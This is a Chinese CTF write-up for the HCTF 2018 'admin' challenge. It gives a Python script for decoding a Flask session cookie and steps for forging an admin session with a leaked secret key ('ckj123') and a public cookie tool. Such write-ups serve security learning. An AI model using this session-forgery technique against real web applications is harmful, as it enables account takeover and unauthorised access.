[HCTF 2018]admin

这个题有很多种解法，弱口令，和利用strslow（）函数，该wp主要写的是利用伪造flask——session获取flag

关于flask的session的一些简单知识

Flask的session使用 - 简书 (jianshu.com)

我们发现需要身份为admin才可以为所欲为

 注册

注册成功后在登录时进行抓包观察

此时我们对这串加密后的编码进行解码

 解密代码如下

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
 
def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
 
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
 
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')
 
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')
 
    return session_json_serializer.loads(payload)
 
if __name__ == '__main__':
    print(decryption('session写这'.encode()))
 

 解密结果：

{'_fresh': True, '_id': b'7825952ea8845281c0777e584de48c6b6a8b885876c3b7e3ecdaa2f57f70ac6bd816c6d9eb791958752999306499eab0988c658ebf9b5081e4fe1239420dc22f', 'csrf_token': b'b6fb3a1fbdf95cb9fd5d0d9437c0268c130d09ff', 'image': b'iQcX', 'name': '111', 'user_id': '10'}

我们观察到session中有一项name为我们自己的id只要将其改为admin即可

之后在源文件中的config.py中找到他的密钥匙’ckj123‘，将'name': '111'改为'name': 'admin’在进行加密即可

加密工具：GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder

 之后将伪造的session替换原来的session即可获取flag